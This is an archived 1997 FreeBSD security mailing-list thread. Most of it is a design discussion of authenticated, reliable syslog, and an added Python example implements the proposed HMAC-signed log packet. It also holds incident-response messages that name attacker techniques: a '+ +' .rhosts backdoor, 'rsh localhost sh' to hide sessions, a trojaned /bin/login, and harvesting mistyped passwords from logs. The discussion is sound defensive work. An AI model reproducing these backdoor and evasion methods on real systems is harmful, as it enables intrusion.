Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA13664 for ; Mon, 28 Jul 1997 08:49:00 -0700 (PDT)
Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id LAA03402; Mon, 28 Jul 1997 11:48:46 -0400 (EDT)
Date: Mon, 28 Jul 1997 11:48:46 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: Dug Song
cc: David Holland, freebsd-security@freebsd.org
Subject: Re: secure logging (was: Re: security hole in FreeBSD)

On Mon, 28 Jul 1997, Dug Song wrote:

> i've looked for years for a secure syslog/d replacement, and the only
> thing i've heard of that even comes close is a redirection through an SSH
> tunnel.

I've been experimenting with SSH as a generic tunneling tool, but have had problems maintaining connections, and determining correct behavior in various situations. It seems like the overhead involved here may be a problem. IPsec might offer some solutions, but isn't generally available just now. DNSsec as a means of IPsec SPI keying sounds good as a general security tool. :)

> in our case, we're looking at a Kerberized solution, but this carries way
> too much overhead to be useful. what we really want from syslog is

Someone else suggested Kerberos as a solution, but it has somewhat more limited application than a general-purpose security architecture for syslog. I use Kerberos for my own machines, as well as at Carnegie Mellon, and the overhead seems significant. It also brings up some questions about the identities of the various syslog participants. As an individual, must I have a Kerberos principal associated with me to be able to log? Do I need a ticket (probably)? Does this mean storing passwords for the keys on systems that require it (presumably a srvtab of some kind), which might cause additional concerns? In some ways, it would be great to have Kerberos authenticate all log messages -- I could know that this log message came from proto@WATSON.org, or robert.admin@WATSON.ORG, etc. But not everyone runs Kerberos, and there are enough complications to suggest an unkerberized answer might work best.
Perhaps we can work in a named-keying system that allows DNSsec keys to be used, IPsec, etc. I'd rather not use a session mechanism, as reinitializing a session can be time-consuming, hard to identify, not to mention inappropriate in some circumstances. Using a set key-name and key is more efficient and easier to design. General-purpose key management is still in the wings, so maybe a short term solution involving just a shared secret is the answer for now?

> 1. some degree of auditability, such as local UIDs in each message, to
> deter the local denial-of-service attack. this is the best i've come
> up with, because syslog() really needs to be available to j. random
> process.

I'm tempted to disassociate the network security issues and local security issues for now. This is hard to do in a Kerberos environment (and not really useful in a Kerberos environment), but for most people there is a benefit. I was envisioning more of a host-to-host security mechanism for syslog, and then allowing syslog daemons on hosts to do what they wished. Servers would store the identity of the host based on the keyname (usually of a shared secret) that authenticated the message, and clients could store additional information at their option in the message. In this case, a username or uid. If greater security is needed, keynames can be in the context of a more diversified namespace, such as that of DNS/DNSsec. A log message could come from FQDN, or from identity.FQDN, if a key is configured on the server, and permitted to send the type of log message in question. Use of the DNSsec keyspace isn't really established, yet, though.

> 2. some degree of authentication/authorization, as provided by a shared
> key between loghost and client machines. session key establishment is
> too much overhead, i think. a long-term shared secret is a bad idea
> in general but is probably reasonable to consider for this application.
> either that, or hourly rekeying, or something else that takes less
> work than generating/distributing a new session key for every message.
> maybe one of the EKE variants would be appropriate for this (is there
> an EKE-like protocol that doesn't do modular exponentiation, BTW)?

I agree, and it also raises questions if a system reboots, moves, etc. keyname/shared secret pairs are probably the answer unless public/private keying gets a bit faster. Then one could authenticate messages using DNSsec to a name, and a set of names would be permitted to send log messages by a syslog.conf file. E.g.,

	permit fledge.watson.org/145
	permit cyrus.watson.org/145	<-- /145 indicates the key footprint to use

I retrieve the pub key and verify the packet against it for the first packet, and cache the key for future packets. In a high-volume logging environment, this might be too heavy, in which case a shared secret could be used:

	permit fledge.watson.org.local	HMAC-MD5	xxxxxkeyxxxxxxxxxx
	permit cyrus.watson.org.local	HMAC-MD5	xxxxxkeyxxxxxxxxxx

Some form of chunking/clustering of log messages would be especially useful in the pub/private key case.

> 3. message integrity, and maybe privacy. HMACs are good, but maybe
> something like rc5 would be okay. i just don't want to incur the
> overhead of DES or IDEA (maybe this could be configurable?).
>
> i guess 2 and 3 are only really applicable in the loghost (as opposed to
> local logging) scenario. anyhow, i'm just brainstorming here, let me know
> if you have any other thoughts on this.

Is privacy an issue for logging? It would appear to be for authentication information, as security of logs is important for protecting a host. Especially things like login retries where the username is listed, and might be the password typed at the login: prompt :). I've been thinking only in terms of integrity, but privacy might be important too..
A similar key naming system may work, but choice of algorithms is an issue (not to mention export control :). Small keys are probably ok since logs aren't all-that-sensitive?

From owner-freebsd-security Mon Jul 28 08:56:12 1997
From: "Rodney W. Grimes"
Message-Id: <199707281555.IAA17841@GndRsh.aac.dev.com>
Subject: Re: secure logging (was: Re: security hole in FreeBSD)
In-Reply-To: <199707281340.JAA03478@homeport.org> from Adam Shostack at "Jul 28, 97 09:40:14 am"
To: adam@homeport.org (Adam Shostack)
Date: Mon, 28 Jul 1997 08:55:23 -0700 (PDT)
Cc: dholland@eecs.harvard.edu, robert@cyrus.watson.org, security@FreeBSD.ORG

> | I don't know of any; if you run across one or are thinking about
> | designing one, please post or mail... absent any other readily
> | available secure mechanism probably the best bet is to carry log data
> | over ssh. Of course, this doesn't solve the denial of service issue as
> | anyone with a login can spam the local syslog.
>
> I've been working on a draft set of requirements--very drafty, but
> since the subject came up, I'll share & ask for feedback.
>
>
> Requirements
>
> Reliability: The system must make substantial efforts to not
> lose information.
>
> Network Requirements
> TCP based
> Application sequencing with explicit ack before sender deletes

How are you going to handle the log server going away and coming back??

> Application Reliability
> NO data discarding
> Solid message handling locally-messages kept until discard
> Repeated message management (?)
>
> Portability
> External Alerting
> External Intrusion Detection linking

Security: The data over the network must be unreadable unless a secret is known. Syslog data can contain confidential information.

How about just converting syslog/syslogd to handle a kerberized t/tcp connection??

-- 
Rod Grimes					rgrimes@gndrsh.aac.dev.com
Accurate Automation, Inc.
Reliable computers for FreeBSD

From owner-freebsd-security Mon Jul 28 09:09:13 1997
From: Adam Shostack
Message-Id: <199707281604.MAA04611@homeport.org>
Subject: Re: secure logging (was: Re: security hole in FreeBSD)
In-Reply-To: <199707281555.IAA17841@GndRsh.aac.dev.com> from "Rodney W. Grimes" at "Jul 28, 97 08:55:23 am"
To: rgrimes@GndRsh.aac.dev.com (Rodney W. Grimes)
Date: Mon, 28 Jul 1997 12:04:52 -0400 (EDT)
Cc: adam@homeport.org, dholland@eecs.harvard.edu, robert@cyrus.watson.org, security@FreeBSD.ORG

Rodney W. Grimes wrote:
| > Reliability: The system must make substantial efforts to not
| > lose information.
| >
| > Network Requirements
| > TCP based
| > Application sequencing with explicit ack before sender deletes
|
| How are you going to handle the log server going away and coming back??

The client will have to queue messages. It's possible that TCP message queueing will handle this; it's also possible that the application will need some retransmit smarts, which would be unfortunate, since it adds a good deal of complexity.

Should there be a capability for multiple log servers (like mail?)

| > Application Reliability
| > NO data discarding
| > Solid message handling locally-messages kept until discard
| > Repeated message management (?)
| >
| > Portability
| > External Alerting
| > External Intrusion Detection linking
|
| Security: The data over the network must be unreadable
| unless a secret is known. Syslog data can contain
| confidential information.

Is confidentiality or authenticity important? For my purposes, it's authentication. Should we simply allow the use of IPsec or SSH port forwarding for confidentiality and authentication? It cuts complexity substantially.

| How about just converting syslog/syslogd to handle a kerberized
| t/tcp connection??

Syslog still discards data when its local daemon cache gets too full.
It discards data when forwarding messages from host A via host B to host C. (Yes, real case.) It loses priority and type when putting messages into files.

Not that kerberizing a TCP based syslog would be bad, I just don't think it's sufficient.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
							-Hume

From owner-freebsd-security Mon Jul 28 10:09:15 1997
Date: Mon, 28 Jul 1997 13:08:43 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: Adam Shostack
cc: "Rodney W. Grimes", dholland@eecs.harvard.edu, security@FreeBSD.ORG
Subject: Re: secure logging (was: Re: security hole in FreeBSD)
In-Reply-To: <199707281604.MAA04611@homeport.org>

On Mon, 28 Jul 1997, Adam Shostack wrote:

> Rodney W. Grimes wrote:
>
> | How are you going to handle the log server going away and coming back??
>
> The client will have to queue messages. Its possible that TCP
> message queueing will handle this, its also possible that the
> application will need some retransmit smarts, which would be
> unfortunate, since it adds a good deal of complexity.

I doubt TCP queuing will be sufficient -- if the TCP connection is severed for some reason, I don't want my data to be quietly eaten. The specific ACK'ing of all data before clearing it from the queue seems to be a must. It also adds an additional level of data insertion checking. The added complexity is unfortunate, but seems necessary. To decrease load on forwarding syslog daemons, the daemon should only retain for forwarding log messages that are authenticated.

What should be the behavior of syslog if its queue gets extremely large, and it has lost contact with the loghost? Ideally, only the loghost itself should make decisions regarding discarding data, as it would have the policy stored in its .conf file. However, hosts choosing to use network logging may only want to export certain types of log messages from their own logger. Is it acceptable to have a forwarder filter log messages according to its own logging rules? Should this be a best-effort arrangement? It is not desirable for me to be able to shut down a site by severing its forwarding connection somehow, and then filling up the forwarding host, but I shouldn't lose messages unless absolutely necessary.
I'd rather have the forwarder save them in a file and deliver them later, which is sounding increasingly sendmail-like. Perhaps we should add another field that has bits to define the requirement that a given log message be transmitted using authenticity, confidentiality, and whether it is worth being stored. In any situation where there was significant doubt, the message would be discarded for security reasons, or logged locally and a message passed later to indicate the problem. Also, should authenticity be against a global name space (DNSsec), and then permission to store messages from a given identity be defined against that name space, or should it be for transaction-level only?

I'd almost be tempted to define a wrapper packaging for syslog messages like so:

	u_int16_t	sl_flags
	u_int8_t	sl_prot_type
	u_int8_t	sl_entity_len
	u_int8_t	sl_entity[]
	u_int32_t	sl_timesigned
	u_int16_t	sl_type
	u_int16_t	sl_priority
	u_int16_t	sl_msglen
	u_int8_t	sl_message[]
	u_int8_t	sl_signature_len
	u_int8_t	sl_signature[]

Where the signature is over all values present except for the signature+length itself. Type of protection used would be in the protection type field. This would allow storage of complete log entry entities, including the signing identity, signature that proves it signed the data, priority, etc. This would not provide for guaranteed delivery -- that would be the responsibility of the transport mechanism used by syslog. This could actually be the stored log entry used on syslog servers. To prevent replay (if not provided by the transport), perhaps a sl_log_id (u_int16_t?) could be provided, which would also indicate jumps in the sequence, etc.

> Should there be a capability for multiple log servers (like
> mail?)

Hmm. Multiple destinations yes, but I'm not sure about choosing log servers for load balancing, or backup purposes. Maybe we are looking at an alternate LH RR-type in DNS? A single name, loghost.watson.org would have

	loghost	IN	LH	10	loghost.watson.org.
		IN	LH	20	logback.watson.org.

A TCP session would remain established as long as it could, and if further connections failed, would bounce to the next in the sequence? I'm not sure how to rectify the split log arrangement where bits of log end up all over the place. On the other hand, I don't want to lose log entries when my main loghost reboots or loads a new syslog version. Load balancing could be arranged using two LH entries with the same level...? The benefits here seem spotty, but it would be a useful function if a more elegant mechanism can be devised -- preferably one not this complicated? :) The more complicated it is, the more likely it will have a problem and be required to log its errors :)

> | > Application Reliability
> | > NO data discarding
> | > Solid message handling locally-messages kept until discard
> | > Repeated message management (?)
> | >
> | > Portability
> | > External Alerting
> | > External Intrusion Detection linking
> |
> | Security: The data over the network must be unreadable
> | unless a secret is known. Syslog data can contain
> | confidential information.
>
> Is confidentiality or authenticity important? For my
> purposes, its authentication. Should we simply allow the use of IPsec
> or SSH port forwarding for confidentiality and authentication? It
> cuts complexity substantially.

Confidentiality should be optional, but available. Authentication errors, as well as serious debugging errors (etc), should not pass unencrypted on the line. It might even be ideal to be able to specify whether a particular log level or type required confidentiality -- I could lower the cost of logging by not requiring mail.* entries to be confidential.

Correct me if I'm wrong, but I don't believe UDP over IPsec provides replay protection, retransmission, etc. I think it just provides authenticity and integrity protection, as well as confidentiality. It doesn't provide TCP-esque ordering, etc. IPsec protecting TCP would provide this feature.
IPsec seems like a good tool, but it is not widely available yet, so I'd rather not rely on its being there, for now. It also doesn't provide a keying mechanism, relying on some key distribution system, as well as ISAKMP/Oakley. I'm not sure what the current implementations look like, so I don't know how simple it would be to implement.

SSH may offer too much overhead, providing some but not all of the features required? I haven't worked with SSH on the programming side, only on the application side, so am not familiar with it as a tool for this type of activity. Could someone provide an evaluation of SSH in terms of providing the requirements we've discussed?

> > | How about just converting syslog/syslogd to handle a kerberized
> > | t/tcp connection??
>
> Syslog still discards data when its local daemon cache gets too full.
> It discards data when forwarding messages from host a via host B to
> host C. (Yes, real case.) It loses priority and type when putting
> messages into files

I feel that, in file format, log data should retain all of the features it had when generated, in addition to authenticity information attached by the loghost.

> Not that kerberizing a TCP based syslog would be bad, I just don't
> think its sufficient.

I suspect there are a number of other complications in kerberizing syslog, including the identities taken on by various parties generating the log messages?
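An added illustration of the wrapper packaging Robert Watson sketches in this message (example code written for this archive page, not code from the thread or from FreeBSD): it packs the fields in the order he gives, signs everything except sl_signature_len/sl_signature with a keyed HMAC looked up by sl_entity, the way the `permit <keyname> HMAC-MD5 <secret>` lines earlier in the thread would configure it, and uses the proposed sl_log_id to drop replays and report sequence jumps. The sl_prot_type values, the placement of sl_log_id right after sl_timesigned, the key table contents and the sample log text are assumptions.

```python
import hashlib
import hmac
import struct

# sl_prot_type values are assumptions; the thread only names HMAC-MD5.
# HMAC-MD5 is kept to match the thread; a new deployment would pick SHA-256.
PROT_HMAC_MD5 = 1
PROT_HMAC_SHA256 = 2
_DIGESTS = {PROT_HMAC_MD5: hashlib.md5, PROT_HMAC_SHA256: hashlib.sha256}

# Constructed key table standing in for the thread's
#   permit fledge.watson.org.local  HMAC-MD5  xxxxxkeyxxxxxxxxxx
# lines: keyname (carried in sl_entity) -> shared secret. Placeholder secrets.
KEYS = {
    b"fledge.watson.org.local": b"xxxxxkeyxxxxxxxxxx",
    b"cyrus.watson.org.local": b"yyyyykeyyyyyyyyyyy",
}

# Wire layout, big-endian, following the sketch; sl_log_id (assumed 16-bit,
# placed after sl_timesigned) is the replay counter the message proposes.
_HEAD = struct.Struct("!HBB")    # sl_flags, sl_prot_type, sl_entity_len
_BODY = struct.Struct("!IHHHH")  # sl_timesigned, sl_log_id, sl_type, sl_priority, sl_msglen


def _signed_part(flags, prot_type, entity, timesigned, log_id, msg_type, priority, message):
    """Everything the signature covers: all fields except sl_signature_len/sl_signature."""
    if len(entity) > 0xFF or len(message) > 0xFFFF:
        raise ValueError("field too long for its length field")
    return (_HEAD.pack(flags, prot_type, len(entity)) + entity
            + _BODY.pack(timesigned, log_id, msg_type, priority, len(message)) + message)


def sign_message(entity, secret, message, *, log_id, timesigned,
                 msg_type=0, priority=6, flags=0, prot_type=PROT_HMAC_MD5):
    """Client side: one packet = signed part + sl_signature_len + sl_signature."""
    body = _signed_part(flags, prot_type, entity, timesigned, log_id, msg_type, priority, message)
    sig = hmac.new(secret, body, _DIGESTS[prot_type]).digest()
    return body + bytes([len(sig)]) + sig


class LogHost:
    """Loghost side: authenticate each packet against the key table and track
    sl_log_id per sender so replays are dropped and sequence gaps are reported."""

    def __init__(self, keys, max_skew=300):
        self.keys = keys
        self.max_skew = max_skew      # seconds of clock drift tolerated on sl_timesigned
        self.last_id = {}             # entity -> highest sl_log_id accepted so far

    def receive(self, packet, now):
        """Return (accepted, reason, record); record is None when rejected."""
        try:
            flags, prot_type, elen = _HEAD.unpack_from(packet, 0)
            off = _HEAD.size
            entity = packet[off:off + elen]
            off += elen
            timesigned, log_id, msg_type, priority, mlen = _BODY.unpack_from(packet, off)
            off += _BODY.size
            message = packet[off:off + mlen]
            off += mlen
            sig_len = packet[off]
            sig = packet[off + 1:off + 1 + sig_len]
        except (struct.error, IndexError):
            return False, "malformed packet", None
        if len(entity) != elen or len(message) != mlen or off + 1 + sig_len != len(packet):
            return False, "truncated or trailing data", None
        secret = self.keys.get(entity)
        if secret is None or prot_type not in _DIGESTS:
            return False, "unknown keyname or protection type", None
        # Verify over the exact bytes received, never over re-packed fields.
        expected = hmac.new(secret, packet[:off], _DIGESTS[prot_type]).digest()
        if not hmac.compare_digest(expected, sig):
            return False, "bad signature", None
        if abs(now - timesigned) > self.max_skew:
            return False, "sl_timesigned outside acceptance window", None
        last = self.last_id.get(entity)
        if last is not None and log_id <= last:   # a real daemon must also handle 16-bit wrap
            return False, "replayed or out-of-order sl_log_id", None
        gap = 0 if last is None else log_id - last - 1   # jumps hint at lost or suppressed entries
        self.last_id[entity] = log_id
        record = {"flags": flags, "prot_type": prot_type, "entity": entity,
                  "timesigned": timesigned, "log_id": log_id, "type": msg_type,
                  "priority": priority, "message": message, "gap": gap}
        return True, "ok", record


if __name__ == "__main__":
    host = LogHost(KEYS)
    pkt = sign_message(b"fledge.watson.org.local", KEYS[b"fledge.watson.org.local"],
                       b"login: REPEATED LOGIN FAILURES ON ttyp0", log_id=1, timesigned=870000000)
    print(host.receive(pkt, now=870000000))   # accepted
    print(host.receive(pkt, now=870000001))   # same packet again: replay rejected
```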
From owner-freebsd-security Mon Jul 28 10:23:46 1997
Date: Mon, 28 Jul 1997 13:22:44 +0000 (GMT)
From: "Jonathan A. Zdziarski"
To: Ollivier Robert
cc: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
In-Reply-To: <19970728171633.10794@keltia.freenix.fr>

I would check also /etc/inetd.conf to make sure he didn't set himself up with a root-environment on some port. I know finger -P will let you run for example a shell, and if it is set up as root, well...

-------------------------------------------------------------------------
Jonathan A. Zdziarski			NetRail Incorporated
Server Engineering Manager		230 Peachtree St. Suite 500
jonz@netrail.net			Atlanta, GA 30303
http://www.netrail.net			(888) - NETRAIL
-------------------------------------------------------------------------

On Mon, 28 Jul 1997, Ollivier Robert wrote:

:According to Vincent Poy:
:> 1) User on mercury machine complained about perl5 not working which was
:> perl5.003 since libmalloc lib it was linked to was missing.
:> 2) I recompiled the perl5 port from the ports tree and it's perl5.00403
:> and it works.
:
:I don't think he used perl to hack root unless you kept old versions of
:Perl4 and Perl5. The buffer overflows in Perl4 were plugged in May by
:Werner. 5.003+ holes are fixed in 5.004 and later.
:
:> 6) We went to inetd.conf and shut off all daemons except telnetd and
:> rebooted and user still can get onto the machine invisibly.
:
:That shows that he has used a spare port to hook a root shell on. In these
:case, "netstat -a" or "lsof -i:TCP" will give you all connections,
:including those on which a program is LISTENing to. That way you'll catch
:any process left on a port.
:
:-- 
:Ollivier ROBERT -=- FreeBSD: There are no limits -=- roberto@keltia.freenix.fr
:FreeBSD keltia.freenix.fr 3.0-CURRENT #23: Sun Jul 20 18:10:34 CEST 1997
:

From owner-freebsd-security Mon Jul 28 10:26:07 1997
Date: Mon, 28 Jul 1997 13:25:24 +0000 (GMT)
From: "Jonathan A. Zdziarski"
To: security@freebsd.org
Subject: security hole in bsd

BTW: You said you didn't know how he hacked into your other system as he doesn't have an account on it. Do you have a .rhosts file in the root directory of the other server or a hosts.equiv file allowing the two to share root/other privileged logins between the two? As root he'd be able to su to anything. How about NFS/rdist permissions?

From owner-freebsd-security Mon Jul 28 10:27:31 1997
From: "Rodney W. Grimes"
Message-Id: <199707281726.KAA18251@GndRsh.aac.dev.com>
Subject: Re: secure logging (was: Re: security hole in FreeBSD)
In-Reply-To: <199707281604.MAA04611@homeport.org> from Adam Shostack at "Jul 28, 97 12:04:52 pm"
To: adam@homeport.org (Adam Shostack)
Date: Mon, 28 Jul 1997 10:26:47 -0700 (PDT)
Cc: adam@homeport.org, dholland@eecs.harvard.edu, robert@cyrus.watson.org, security@FreeBSD.ORG

> Rodney W. Grimes wrote:
> | > Reliability: The system must make substantial efforts to not
> | > lose information.
> | >
> | > Network Requirements
> | > TCP based
> | > Application sequencing with explicit ack before sender deletes
> |
> | How are you going to handle the log server going away and coming back??
>
> The client will have to queue messages. Its possible that TCP
> message queueing will handle this, its also possible that the
> application will need some retransmit smarts, which would be
> unfortunate, since it adds a good deal of complexity.

TCP message queueing won't handle the fact that the server has rebooted and the connection is going to get a ``reset by peer'' next time you try to send data on it. You're going to need some very robust code a la what NFSv3 over TCP does in order to handle the server coming and going.

> Should there be a capability for multiple log servers (like
> mail?)

Probably a really good thing!

> | > Application Reliability
> | > NO data discarding
> | > Solid message handling locally-messages kept until discard
> | > Repeated message management (?)
> | >
> | > Portability
> | > External Alerting
> | > External Intrusion Detection linking
> |
> | Security: The data over the network must be unreadable
> | unless a secret is known. Syslog data can contain
> | confidential information.
>
> Is confidentiality or authenticity important? For my

Both confidentiality and authenticity are important. Realize syslog may be logging login failures, some systems pass the attempted username in login failure cases, and often this is a passwd due to out of sequence data entry (user entered passwd at username prompt). Go grep /var/log/messages on a few 100 timesharing systems and you can often come up with a password or two, then you just have to match it to a user...

> purposes, its authentication. Should we simply allow the use of IPsec
> or SSH port forwarding for confidentiality and authentication? It
> cuts complexity substantially.

That would be one solution, but not all hosts implement IPsec. SSH would work, but SSH can't handle the fact that the server got rebooted and you have to establish a new connection.

> | How about just converting syslog/syslogd to handle a kerberized
> | t/tcp connection??
>
> Syslog still discards data when its local daemon cache gets too full.

No matter what you do you're not going to totally fix the discard data problem. Even a malloc'ed data structure will sooner or later fill all memory and all swap space. A disk based queue could fill all disk space. This ``discard data'' problem is a real bear!

> It discards data when forwarding messages from host a via host B to
> host C. (Yes, real case.) It loses priority and type when putting
> messages into files
>
> Not that kerberizing a TCP based syslog would be bad, I just don't
> think its sufficient.

But it is a step in the right direction. Could be implemented in a day or two of work.

-- 
Rod Grimes					rgrimes@gndrsh.aac.dev.com
Accurate Automation, Inc.
Reliable computers for FreeBSD

From owner-freebsd-security Mon Jul 28 11:01:03 1997
Date: Mon, 28 Jul 1997 10:59:30 -0700 (PDT)
From: Vincent Poy
To: Eric Feillant
cc: Tomasz Dudziak, security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To: <33DC9377.655C@EUnet-Bretagne.fr>

On Mon, 28 Jul 1997, Eric Feillant wrote:

=)Another way to be invisible is to try something like that:
=)
=)rsh localhost sh
=)
=)A w or who command see nothing. A ps does.

	That may be true too since I was looking and there were .rhosts files in directories of users that were not there before and the .rhosts file just had two +'s for the contents.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 11:24:12 1997
Date: Mon, 28 Jul 1997 11:23:40 -0700 (PDT)
From: Vincent Poy
To: Robert Watson
cc: Tomasz Dudziak, security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Robert Watson wrote:

=)> He wasn't invisible to netstat but he did do something that faked
=)> the hostname even in netstat.
=)
=)In this case, the chances are he just inserted some dud DNS entries, or
=)simply set his in-addr.arpa to something nasty. There's nothing one can
=)do to prevent an authoritative name entry (trash or not) from being
=)accepted in DNS or DNSsec. One thing I would like to see is logging of IP
=)address *and* hostname in the logs. Both are useful, depending on the
=)situation. Due to the nature of TCP, IP addresses are fairly useful in
=)tracing an attack, but often, especially after a time delay, hostnames are
=)the only way to easily contact the maintainer of the IP address. Hostname
=)is also more useful in spotting attacks in the first place, as it's easy
=)for a user to tell when they've logged in from somewhere they haven't :).

	I don't think he can change his in-addr.arpa since he was using his Linux machine from a Netcom ppp connection. What he did was move netstat to another filename so he didn't think we had access to netstat, but thanks to screen's invisibility mode and FreeBSD -current, I recompiled the thing and reinstalled in less than 20 seconds while jbhunt was talking to him and saw his source address as wil-de7-10.ix.netcom.com, so many thanks to jmb also here that I did on both mercury and earth:

	route add -host his-ip our-ip -reject

	And the next thing we know, he was back from sh.janey.com so I blocked that out too and then he came back and netstat didn't work anymore this time. It showed fake names such as FreeBSD.HACK.U.NOW:telnet and a bunch of other garbage.
	According to Mario, theca@wil-de7-10.ix.netcom.com is known to be hacking machines all over the place and no one has stopped him yet.

=)BTW, does anyone know if there is a secure logging protocol? Syslog on
=)UDP seems a tad unreliable, not to mention opening one up from DoS. I log
=)to a loghost, and that machine could easily suffer DoS from log flooding,
=)etc. A simple signature arrangement using MD5 (HMAC?) similar to DNS TSIG
=)would be easy enough to arrange, and far more secure. I assume someone,
=)somewhere has written one, or implemented one, but I haven't been
=)following the Internet Draft releases too closely.

	Yep, I think he did something to syslogd since he did come in via a telnet connection but the tcp wrappers didn't show his connections but all other connections were logged.

=)> =)There was a security hole some time ago in perl that allowed local users
=)> =)to gain root access... That's probably the way he got root access...
=)> =)I would check my binaries, sup and recompile.
=)>
=)> Hmmm, I supped the perl from the most recent ports tree and also
=)> all the binaries are about 2 months old from the -current tree. I thought
=)> the security hole was way before that. What I didn't get is how did he
=)> get access to the second system (earth) when he doesn't have an account
=)> there in the first place?
=)
=)I'd be tempted to look in all the normal places -- sendmail, etc. What
=)daemons were running on the machine? Any web server processes? Also, I'd
=)heavily suspect that he sniffed a password if no encrypted telnet/ssh is
=)in use.. Any use of NIS going on? Also, .rhosts arrangements can be
=)extremely unhappy if we already know (s)he is messing with DNS entries.

	sendmail is running as well as apache httpd... ftpd, telnetd, and ircd. No NIS. All I know was he managed to change everyone's .rhosts file when it didn't exist originally and the contents just had:

	+ +

	in it.
Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 11:28:16 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA22953 for security-outgoing; Mon, 28 Jul 1997 11:28:16 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA22938 for ; Mon, 28 Jul 1997 11:28:11 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id LAA05264; Mon, 28 Jul 1997 11:27:34 -0700 (PDT) Date: Mon, 28 Jul 1997 11:27:33 -0700 (PDT) 
From: Vincent Poy To: Guido van Rooij cc: robert@cyrus.watson.org, loco@onyks.wszib.poznan.pl, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net Subject: Re: security hole in FreeBSD In-Reply-To: <199707281353.PAA04645@gvr.win.tue.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Mon, 28 Jul 1997, Guido van Rooij wrote:

=)> BTW, does anyone know if there is a secure logging protocol? Syslog on UDP seems a tad unreliable, not to mention opening one up from DoS. I log
=)
=)Not on local delivery of udp packets. Nowadays, the FreeBSD syslogd is shipped with an option -s that makes it refuse syslog messages from remote machines. This of course does not help if you want to be able to get syslog entries from a remote host. But you can refuse udp packets with destination port 513 on your routers.

How would one do this with a FreeBSD based router using the ET Cards?
Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 11:31:12 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA23160 for security-outgoing; Mon, 28 Jul 1997 11:31:12 -0700 (PDT) Received: from caliban.dihelix.com (caliban.dihelix.com [198.180.136.138]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA23149 for ; Mon, 28 Jul 1997 11:31:07 -0700 (PDT) Received: (from langfod@localhost) by caliban.dihelix.com (8.8.6/8.8.3) id IAA15209; Mon, 28 Jul 1997 08:30:49 -1000 (HST) Message-Id: <199707281830.IAA15209@caliban.dihelix.com> Subject: Re: security hole in FreeBSD In-Reply-To: from Vincent Poy at "Jul 28, 97 03:19:55 am" To: vince@mail.MCESTATE.COM (Vincent Poy) Date: Mon, 28 Jul 1997 08:30:48 -1000 (HST) Cc: security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net 
From: "David Langford" X-blank-line: This space intentionaly left blank. X-Mailer: ELM [version 2.4ME+ PL31 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

I recently caught a breakin fairly similar. The perp replaced /bin/login with one that would let them login to ANY account with a password of "lemmein". The login would NOT be logged and so it was very difficult to tell what was going on. My only guess is that they used the old suidperl hack to get root. Supposedly this doesn't work on newer perl though. My suggestion to you would be to get a clean source tree, recompile everything and install tripwire.

-David Langford langfod@dihelix.com

>The symptoms are as follows:
>1) User on mercury machine complained about perl5 not working which was perl5.003 since libmalloc lib it was linked to was missing.
>2) I recompiled the perl5 port from the ports tree and it's perl5.00403 and it works.
>3) User hacks earth when he doesn't even have an account on the machine and can login to the machine remotely as root when rlogin and telnet wouldn't allow it.
>4) User is invisible in w, finger, who, users and can only be seen using ps -agux on a pty so I killed the process.
>5) User changes hostnames even in a netstat output so it's all garbage
>6) We went to inetd.conf and shut off all daemons except telnetd and rebooted and user still can get onto the machine invisibly.
>7) User shuts down the machine and changes root password
>
> Saw the user on irc posting the password of earth with the login name root. Any ideas?
